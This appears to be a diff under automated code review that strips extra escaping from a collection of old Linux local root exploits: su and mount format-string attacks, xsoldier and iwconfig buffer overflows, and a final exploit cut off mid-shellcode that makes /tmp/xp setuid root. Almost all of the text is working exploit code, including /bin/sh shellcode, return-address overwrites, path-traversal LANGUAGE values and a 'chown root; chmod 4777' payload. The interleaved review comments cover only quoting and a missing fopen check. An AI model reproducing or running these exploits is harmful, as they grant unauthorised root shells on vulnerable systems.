||||
\\\"\\\\x80\\\\xe8\\\\xdc\\\\xff\\\\xff\\\\xff/bin/sh\\\";
|
||||
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
|
||||
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
|
||||
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
|
||||
|
||||
|
||||
unsigned long get_esp(void) {
|
||||
__asm__(\\\"movl %esp,%eax\\\");
|
||||
__asm__("movl %esp,%eax");
|
||||
}
|
||||
|
||||
|
||||
|
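Review bot: escape depth is not uniform across the commit and this hunk is the first place it doubles: `#define PATH \\\"/tmp/LC_MESSAGES\\\"` and `\\\"\\\\xeb\\\\x1f\\\\x5e...` carry two backslash layers, where the preceding files carried one (`\"\\xb0\\x0b\"`). Both reduce to plain C here (`#define PATH "/tmp/LC_MESSAGES"`, `"\xeb\x1f\x5e\x89..."`), so the script that produced the diff was either run with a per-file depth or iterated to a fixed point. Documenting which, and confirming that no file with a genuine `\\` in its source (a Windows path or a regex literal) was over-stripped by the fixed-point approach, would make the change reviewable. `__asm__(\\\"movl %esp,%eax\\\")` to `__asm__("movl %esp,%eax")` is consistent with the rest.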
@ -65,7 +65,7 @@ unsigned long get_esp(void) {
|
|||
int i,reth,retl,num=113;
|
||||
FILE *fp;
|
||||
|
||||
if (argc > 1) sscanf(argv[1],\\\"%x\\\",&retloc);
|
||||
if (argc > 1) sscanf(argv[1],"%x",&retloc);
|
||||
if (argc > 2) offset = atoi(argv[2]);
|
||||
if (argc > 3) num = atoi(argv[3]);
|
||||
if (argc > 4) align = atoi(argv[4]);
|
||||
|
@ -74,27 +74,27 @@ unsigned long get_esp(void) {
|
|||
|
||||
|
||||
|
||||
printf(\\\"Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \\\\n\\\",argv[0]);
|
||||
printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]);
|
||||
|
||||
if (!(buff = malloc(eggsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
if (!(buff1 = malloc(bsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(egg = malloc(eggsize))) {
|
||||
printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
|
||||
printf("Can't allocate memory.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\\\"Using RET location address: 0x%x\\\\n\\\", retloc);
|
||||
printf("Using RET location address: 0x%x\n", retloc);
|
||||
shell_addr = get_esp() + offset;
|
||||
printf(\\\"Using Shellcode address: 0x%x\\\\n\\\", shell_addr);
|
||||
printf("Using Shellcode address: 0x%x\n", shell_addr);
|
||||
|
||||
reth = (shell_addr >> 16) & 0xffff ;
|
||||
retl = (shell_addr >> 0) & 0xffff ;
|
||||
|
@ -102,7 +102,7 @@ unsigned long get_esp(void) {
|
|||
ptr = buff;
|
||||
|
||||
for (i = 0; i <2 ; i++, retloc+=2 ){
|
||||
memset(ptr,\\\'A\\\',4);
|
||||
memset(ptr,'A',4);
|
||||
ptr += 4 ;
|
||||
(*ptr++) = retloc & 0xff;
|
||||
(*ptr++) = (retloc >> 8 ) & 0xff ;
|
||||
|
@ -110,27 +110,27 @@ unsigned long get_esp(void) {
|
|||
(*ptr++) = (retloc >> 24 ) & 0xff ;
|
||||
}
|
||||
|
||||
memset(ptr,\\\'A\\\',align);
|
||||
memset(ptr,'A',align);
|
||||
|
||||
ptr = buff1;
|
||||
|
||||
for(i = 0 ; i < num ; i++ )
|
||||
{
|
||||
memcpy(ptr, \\\"%.8x\\\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr += 4;
|
||||
}
|
||||
|
||||
sprintf(ptr, \\\"%%%uc%%hn%%%uc%%hn\\\",(retl - num*8),
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
|
||||
(0x10000 + reth - retl));
|
||||
|
||||
|
||||
mkdir(PATH,0755);
|
||||
chdir(PATH);
|
||||
fp = fopen(\\\"libc.po\\\", \\\"w+\\\");
|
||||
fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\");
|
||||
fprintf(fp,\\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buff1);
|
||||
fp = fopen("libc.po", "w+");
|
||||
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(fp,"msgstr \"%s\\n\"", buff1);
|
||||
fclose(fp);
|
||||
system(\\\"/usr/bin/msgfmt libc.po -o libc.mo\\\");
|
||||
system("/usr/bin/msgfmt libc.po -o libc.mo");
|
||||
|
||||
|
||||
ptr = egg;
|
||||
|
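Review bot: the deepest nesting in the commit is in the `.po` writer and it comes out right: `fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\");` becomes `fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");`, so the C string still emits a quoted PO `msgid` in which `\n` is the two-character gettext escape rather than a newline, followed by a real newline. A separate, pre-existing point visible in the same lines: `fp = fopen("libc.po", "w+");` is handed to the following `fprintf` calls without a NULL check, whereas the mount exploit later in this commit tests `fopen` and exits on failure; out of scope for an escaping fix, but worth a follow-up.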
@ -140,13 +140,13 @@ unsigned long get_esp(void) {
|
|||
for (i = 0; i < strlen(shellcode); i++)
|
||||
*(ptr++) = shellcode[i];
|
||||
|
||||
egg[eggsize - 1] = \\\'\\\\0\\\';
|
||||
egg[eggsize - 1] = '\0';
|
||||
|
||||
memcpy(egg, \\\"EGG=\\\", 4);
|
||||
memcpy(egg, "EGG=", 4);
|
||||
env[0] = egg ;
|
||||
env[1] = \\\"LANGUAGE=sk_SK/../../../../../../tmp\\\";
|
||||
env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
|
||||
env[2] = (char *)0 ;
|
||||
|
||||
execle(\\\"/bin/su\\\",\\\"su\\\",\\\"-u\\\", buff, NULL,env);
|
||||
execle("/bin/su","su","-u", buff, NULL,env);
|
||||
|
||||
} /* end of main */
|
|
@ -6,7 +6,7 @@
|
|||
* Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112
|
||||
* compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112
|
||||
*
|
||||
* \\\"objdump /bin/mount | grep exit\\\" to get the -a address
|
||||
* "objdump /bin/mount | grep exit" to get the -a address
|
||||
*
|
||||
* - sk8
|
||||
*/
|
||||
|
@ -17,32 +17,32 @@
|
|||
|
||||
char sc[]=
|
||||
/* main: */ /* setreuid(0, 0); */
|
||||
\\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */
|
||||
\\\"\\\\xb0\\\\x46\\\" /* movb $70, %al */
|
||||
\\\"\\\\x29\\\\xdb\\\" /* subl %ebx, %ebx */
|
||||
\\\"\\\\xb3\\\\x0c\\\" /* movb $12, %bl */
|
||||
\\\"\\\\x80\\\\xeb\\\\x0c\\\" /* subb $12, %bl */
|
||||
\\\"\\\\x89\\\\xd9\\\" /* movl %ebx, %ecx */
|
||||
\\\"\\\\xcd\\\\x80\\\" /* int $0x80 */
|
||||
\\\"\\\\xeb\\\\x18\\\" /* jmp callz */
|
||||
"\x29\xc0" /* subl %eax, %eax */
|
||||
"\xb0\x46" /* movb $70, %al */
|
||||
"\x29\xdb" /* subl %ebx, %ebx */
|
||||
"\xb3\x0c" /* movb $12, %bl */
|
||||
"\x80\xeb\x0c" /* subb $12, %bl */
|
||||
"\x89\xd9" /* movl %ebx, %ecx */
|
||||
"\xcd\x80" /* int $0x80 */
|
||||
"\xeb\x18" /* jmp callz */
|
||||
|
||||
/* start: */ /* execve of /bin/sh */
|
||||
\\\"\\\\x5e\\\" /* popl %esi */
|
||||
\\\"\\\\x29\\\\xc0\\\" /* subl %eax, %eax */
|
||||
\\\"\\\\x88\\\\x46\\\\x07\\\" /* movb %al, 0x07(%esi) */
|
||||
\\\"\\\\x89\\\\x46\\\\x0c\\\" /* movl %eax, 0x0c(%esi) */
|
||||
\\\"\\\\x89\\\\x76\\\\x08\\\" /* movl %esi, 0x08(%esi) */
|
||||
\\\"\\\\xb0\\\\x0b\\\" /* movb $0x0b, %al */
|
||||
\\\"\\\\x87\\\\xf3\\\" /* xchgl %esi, %ebx */
|
||||
\\\"\\\\x8d\\\\x4b\\\\x08\\\" /* leal 0x08(%ebx), %ecx */
|
||||
\\\"\\\\x8d\\\\x53\\\\x0c\\\" /* leal 0x0c(%ebx), %edx */
|
||||
\\\"\\\\xcd\\\\x80\\\" /* int $0x80 */
|
||||
"\x5e" /* popl %esi */
|
||||
"\x29\xc0" /* subl %eax, %eax */
|
||||
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
|
||||
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
|
||||
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
|
||||
"\xb0\x0b" /* movb $0x0b, %al */
|
||||
"\x87\xf3" /* xchgl %esi, %ebx */
|
||||
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
|
||||
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
|
||||
"\xcd\x80" /* int $0x80 */
|
||||
|
||||
/* callz: */
|
||||
\\\"\\\\xe8\\\\xe3\\\\xff\\\\xff\\\\xff\\\" /* call start */
|
||||
"\xe8\xe3\xff\xff\xff" /* call start */
|
||||
|
||||
/* /bin/sh */
|
||||
\\\"\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\";
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68";
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
FILE* fp;
|
||||
|
@ -50,7 +50,7 @@ int main(int argc, char** argv) {
|
|||
char buffer[20000], fmtbuf[1000], numbuf[2000];
|
||||
int shloc=0xbfffdaa0;
|
||||
int i=0, c=0;
|
||||
char mode=\\\'n\\\';
|
||||
char mode='n';
|
||||
int debug=0;
|
||||
int eiploc=0xbffffdc0;
|
||||
char* envbuf[2];
|
||||
|
@ -65,20 +65,20 @@ int main(int argc, char** argv) {
|
|||
memset(buffer, 0, sizeof(buffer));
|
||||
memset(fmtbuf, 0, sizeof(fmtbuf));
|
||||
memset(numbuf, 0, sizeof(numbuf));
|
||||
printf(\\\"heapaddr: 0x%x\\\\n\\\", heapaddr);
|
||||
printf("heapaddr: 0x%x\n", heapaddr);
|
||||
c=0;
|
||||
strcpy (xpath, \\\"/bin/mount\\\");
|
||||
strcpy (xpath, "/bin/mount");
|
||||
|
||||
while ((s=getopt(argc, argv, \\\"p:s:b:e:a:n:i:d\\\")) != EOF) {
|
||||
while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) {
|
||||
switch(s) {
|
||||
case \\\'s\\\': shloc=strtoul(optarg, 0, 0); break;
|
||||
case \\\'b\\\': bpad=atoi(optarg); break;
|
||||
case \\\'e\\\': epad=atoi(optarg); break;
|
||||
case \\\'a\\\': eiploc=strtoul(optarg, 0, 0); break;
|
||||
case \\\'n\\\': nump=atoi(optarg); break;
|
||||
case \\\'i\\\': inc=atoi(optarg); break;
|
||||
case \\\'p\\\': strcpy(xpath, optarg); break;
|
||||
case \\\'d\\\': debug=1; break;
|
||||
case 's': shloc=strtoul(optarg, 0, 0); break;
|
||||
case 'b': bpad=atoi(optarg); break;
|
||||
case 'e': epad=atoi(optarg); break;
|
||||
case 'a': eiploc=strtoul(optarg, 0, 0); break;
|
||||
case 'n': nump=atoi(optarg); break;
|
||||
case 'i': inc=atoi(optarg); break;
|
||||
case 'p': strcpy(xpath, optarg); break;
|
||||
case 'd': debug=1; break;
|
||||
default:
|
||||
}
|
||||
}
|
||||
|
@ -87,16 +87,16 @@ int main(int argc, char** argv) {
|
|||
if (epad < 0) epad+=16;
|
||||
|
||||
for (i=0; i < nump; i++) {
|
||||
buffer[c++]=\\\'%\\\';
|
||||
buffer[c++]=\\\'8\\\';
|
||||
buffer[c++]=\\\'x\\\';
|
||||
buffer[c++]='%';
|
||||
buffer[c++]='8';
|
||||
buffer[c++]='x';
|
||||
}
|
||||
|
||||
if (debug) { mode=\\\'p\\\';
|
||||
strcpy(sc, \\\"AAAA\\\");
|
||||
if (debug) { mode='p';
|
||||
strcpy(sc, "AAAA");
|
||||
numnops=0;
|
||||
}
|
||||
printf(\\\"cur strlen: %i\\\\n\\\", strlen(buffer));
|
||||
printf("cur strlen: %i\n", strlen(buffer));
|
||||
|
||||
/* size of executed program (/bin/mount) does not seem to affect these calculations
|
||||
it does affect location of eip however, (which is why its nice to just overwrite exit
|
||||
|
@ -111,58 +111,58 @@ int main(int argc, char** argv) {
|
|||
num[3]=((shloc >> 24) & 0xff)+1;
|
||||
if (num[3] < 0) num[3]+=256;
|
||||
|
||||
sprintf(fmtbuf, \\\"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\\\", num[0]
|
||||
sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0]
|
||||
, mode, num[1], mode, num[2], mode, num[3], mode);
|
||||
printf(\\\"fmtbuf: %s\\\\n\\\", fmtbuf);
|
||||
printf(\\\"strlen(fmtbuf): %i\\\\n\\\", strlen(fmtbuf));
|
||||
printf("fmtbuf: %s\n", fmtbuf);
|
||||
printf("strlen(fmtbuf): %i\n", strlen(fmtbuf));
|
||||
memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));
|
||||
|
||||
memset(buffer+strlen(buffer), 0x90, numnops);
|
||||
memcpy(buffer+strlen(buffer), sc, strlen(sc));
|
||||
|
||||
mkdir(\\\"/tmp/sk8\\\", 0755);
|
||||
mkdir(\\\"/tmp/sk8/LC_MESSAGES\\\", 0755);
|
||||
if ( ! (fp=fopen(\\\"/tmp/sk8/LC_MESSAGES/libc.po\\\", \\\"w\\\") ) ) {
|
||||
printf(\\\"could not create bad libc.po\\\\n\\\");
|
||||
mkdir("/tmp/sk8", 0755);
|
||||
mkdir("/tmp/sk8/LC_MESSAGES", 0755);
|
||||
if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) {
|
||||
printf("could not create bad libc.po\n");
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(fp, \\\"msgid \\\\\\\"%%s: unrecognized option `--%%s\\\'\\\\\\\\n\\\\\\\"\\\\n\\\");
|
||||
fprintf(fp, \\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buffer);
|
||||
fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n");
|
||||
fprintf(fp, "msgstr \"%s\\n\"", buffer);
|
||||
fclose(fp);
|
||||
|
||||
system(\\\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\\\");
|
||||
system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo");
|
||||
|
||||
c=0;
|
||||
numbuf[c++]=\\\'-\\\';
|
||||
numbuf[c++]=\\\'-\\\';
|
||||
numbuf[c++]='-';
|
||||
numbuf[c++]='-';
|
||||
|
||||
memset(numbuf+strlen(numbuf), \\\'B\\\', bpad);
|
||||
memset(numbuf+strlen(numbuf), 'B', bpad);
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+1;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+2;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+3;
|
||||
printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
|
||||
memset(numbuf+strlen(numbuf), \\\'Z\\\', epad);
|
||||
printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
|
||||
printf("cur numbuf length: %i\n", strlen(numbuf));
|
||||
memset(numbuf+strlen(numbuf), 'Z', epad);
|
||||
printf("cur numbuf length: %i\n", strlen(numbuf));
|
||||
|
||||
envbuf[0]=\\\"LANGUAGE=en_GB/../../../../tmp/sk8/\\\";
|
||||
envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/";
|
||||
envbuf[1]=0;
|
||||
|
||||
printf(\\\"strlen(numbuf): %i\\\\n\\\", strlen(numbuf));
|
||||
printf(\\\"bpad: %i; epad: %i\\\\n\\\", bpad, epad);
|
||||
printf(\\\"number of %%p\\\'s to traverse stack: %i\\\\n\\\", nump);
|
||||
printf(\\\"address of eip: 0x%x\\\\n\\\", eiploc);
|
||||
printf(\\\"inc: %i\\\\n\\\", inc);
|
||||
printf("strlen(numbuf): %i\n", strlen(numbuf));
|
||||
printf("bpad: %i; epad: %i\n", bpad, epad);
|
||||
printf("number of %%p's to traverse stack: %i\n", nump);
|
||||
printf("address of eip: 0x%x\n", eiploc);
|
||||
printf("inc: %i\n", inc);
|
||||
|
||||
execle(xpath, \\\"mount\\\", numbuf, 0, envbuf);
|
||||
execle(xpath, "mount", numbuf, 0, envbuf);
|
||||
}
|
||||
|
||||
|
||||
|
|
|
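Review bot: `\\\'` is ambiguous on the way in (it can be `'` escaped twice or `\'` escaped once) but not on the way out: in this hunk ``unrecognized option `--%%s\\\'\\\\\\\\n`` becomes ``unrecognized option `--%%s'\\n``, and a bare `'` inside a C double-quoted string is valid whichever form the author originally used, so collapsing to `'` is the safe choice. The `%%%id%%h%c` format template and the four `*(long*)(numbuf+strlen(numbuf))=eiploc+N;` writes pass through unchanged, which confirms that the rewrite only touched quote and backslash characters.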
@ -7,15 +7,15 @@
|
|||
#define RANGE 20
|
||||
|
||||
unsigned char blah[] =
|
||||
\"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x6c\\x80\\x36\\x01\\x46\\xe2\\xfa\"
|
||||
\"\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\"
|
||||
\"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\xc7\\x11\"
|
||||
\"\\x01\\x01\\x8c\\xba\\x1f\\xee\\xfe\\xfe\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x88\\x7c\\xf9\\xb9\"
|
||||
\"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\"
|
||||
\"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x30\\xc1\\x5a\\x5f\\x5e\\x88\\xed\\x5c\"
|
||||
\"\\xc2\\x91\";
|
||||
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
|
||||
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
|
||||
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
|
||||
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
|
||||
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
|
||||
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
|
||||
"\xc2\x91";
|
||||
|
||||
long get_sp () { __asm__ (\"mov %esp, %eax\"); }
|
||||
long get_sp () { __asm__ ("mov %esp, %eax"); }
|
||||
|
||||
int
|
||||
main (int argc, char *argv[])
|
||||
|
@ -38,10 +38,10 @@ main (int argc, char *argv[])
|
|||
for (i = i + strlen (blah); i < BUFSIZE; i += 4)
|
||||
*(long *) &buffer[i] = ret+offset;
|
||||
|
||||
fprintf(stderr, \"xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\\n\");
|
||||
fprintf(stderr, \"zorgon@antionline.org\\n\");
|
||||
fprintf(stderr, \"[return address = %x] [offset = %d] [buffer size = %d]\\n\", ret + offset, offset, BUFSIZE);
|
||||
execl (\"./xsoldier\", \"xsoldier\", \"-display\", buffer, 0);
|
||||
fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n");
|
||||
fprintf(stderr, "zorgon@antionline.org\n");
|
||||
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE);
|
||||
execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -19,17 +19,17 @@ Exploit:
|
|||
/* x86/linux shellcode */
|
||||
|
||||
char shellcode[]= /* 24 bytes */
|
||||
\"\\x31\\xc0\" /* xorl %eax,%eax */
|
||||
\"\\x50\" /* pushl %eax */
|
||||
\"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */
|
||||
\"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */
|
||||
\"\\x89\\xe3\" /* movl %esp,%ebx */
|
||||
\"\\x50\" /* pushl %eax */
|
||||
\"\\x53\" /* pushl %ebx */
|
||||
\"\\x89\\xe1\" /* movl %esp,%ecx */
|
||||
\"\\x99\" /* cltd */
|
||||
\"\\xb0\\x0b\" /* movb $0x0b,%al */
|
||||
\"\\xcd\\x80\"; /* int $0x80 */
|
||||
"\x31\xc0" /* xorl %eax,%eax */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
|
||||
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
|
||||
"\x89\xe3" /* movl %esp,%ebx */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x53" /* pushl %ebx */
|
||||
"\x89\xe1" /* movl %esp,%ecx */
|
||||
"\x99" /* cltd */
|
||||
"\xb0\x0b" /* movb $0x0b,%al */
|
||||
"\xcd\x80"; /* int $0x80 */
|
||||
|
||||
|
||||
int main(int argc,char **argv){
|
||||
|
@ -37,11 +37,11 @@ int main(int argc,char **argv){
|
|||
unsigned long ret;
|
||||
int i;
|
||||
|
||||
char *prog[]={\"/sbin/iwconfig\",buf,NULL};
|
||||
char *env[]={\"HOME=/\",shellcode,NULL};
|
||||
char *prog[]={"/sbin/iwconfig",buf,NULL};
|
||||
char *env[]={"HOME=/",shellcode,NULL};
|
||||
|
||||
ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
|
||||
printf(\"use ret addr: 0x%x\\n\",ret);
|
||||
printf("use ret addr: 0x%x\n",ret);
|
||||
|
||||
memset(buf,0x41,sizeof(buf));
|
||||
memcpy(&buf[92],&ret,4);
|
||||
|
|
|
@ -15,18 +15,18 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
|
||||
#include <stdio.h>
|
||||
|
||||
#define BIN \"/sbin/iwconfig\"
|
||||
#define BIN "/sbin/iwconfig"
|
||||
|
||||
unsigned char shellcode[] =
|
||||
\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\\x2e\"
|
||||
\"\\xcd\\x80\\x31\\xc0\\x53\\x68\\x77\\x30\\x30\\x74\\x89\\xe3\"
|
||||
\"\\xb0\\x27\\xcd\\x80\\x31\\xc0\\xb0\\x3d\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x31\\xdb\\x31\\xc9\\xb1\\x0a\\x50\\x68\\x2e\\x2e\\x2f\\x2f\"
|
||||
\"\\xe2\\xf9\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
|
||||
\"\\x6a\\x2e\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
|
||||
\"\\x31\\xc9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\"
|
||||
\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\";
|
||||
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
|
||||
"\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
|
||||
"\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
|
||||
"\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
|
||||
"\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
|
||||
"\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
|
||||
"\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
|
||||
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
|
||||
"\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
|
||||
|
||||
int
|
||||
main ()
|
||||
|
@ -40,7 +40,7 @@ main ()
|
|||
*(add_ptr++)=ret_add;
|
||||
memset ((char *)out, 0x90, 1337);
|
||||
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
|
||||
memcpy((char *)out, \"OUT=\", 4);
|
||||
memcpy((char *)out, "OUT=", 4);
|
||||
putenv(out);
|
||||
execl (BIN, BIN, buf, NULL);
|
||||
return 0;
|
||||
|
|
|
@ -21,7 +21,7 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
*/
|
||||
|
||||
/*
|
||||
* Yet another Proof Of Concept Xploit for \'iwconfig\'
|
||||
* Yet another Proof Of Concept Xploit for 'iwconfig'
|
||||
*/
|
||||
|
||||
|
||||
|
@ -32,8 +32,8 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
#define RET 0xbffffc3f
|
||||
|
||||
char shellcode[]=
|
||||
\"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\"
|
||||
\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";
|
||||
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
|
||||
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
|
||||
|
||||
int main(int argc,char **argv)
|
||||
{
|
||||
|
@ -49,7 +49,7 @@ int main(int argc,char **argv)
|
|||
|
||||
memcpy(buff+i,shellcode,strlen(shellcode));
|
||||
|
||||
execl(\"/sbin/iwconfig\",\"iwconfig\",buff,(char *)NULL);
|
||||
execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
|
@ -9,23 +9,23 @@
|
|||
#include <dirent.h>
|
||||
|
||||
char *shellcode =
|
||||
\"\\x31\\xc0\\x83\\xc0\\x17\\x31\\xdb\\xcd\\x80\\xeb\"
|
||||
\"\\x30\\x5f\\x31\\xc9\\x88\\x4f\\x17\\x88\\x4f\\x1a\"
|
||||
\"\\x8d\\x5f\\x10\\x89\\x1f\\x8d\\x47\\x18\\x89\\x47\"
|
||||
\"\\x04\\x8d\\x47\\x1b\\x89\\x47\\x08\\x31\\xc0\\x89\"
|
||||
\"\\x47\\x0c\\x8d\\x0f\\x8d\\x57\\x0c\\x83\\xc0\\x0b\"
|
||||
\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"
|
||||
\"\\xcb\\xff\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x30\\x2d\\x63\"
|
||||
\"\\x30\"
|
||||
\"chown root /tmp/xp;chmod 4777 /tmp/xp\";
|
||||
"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
|
||||
"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
|
||||
"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
|
||||
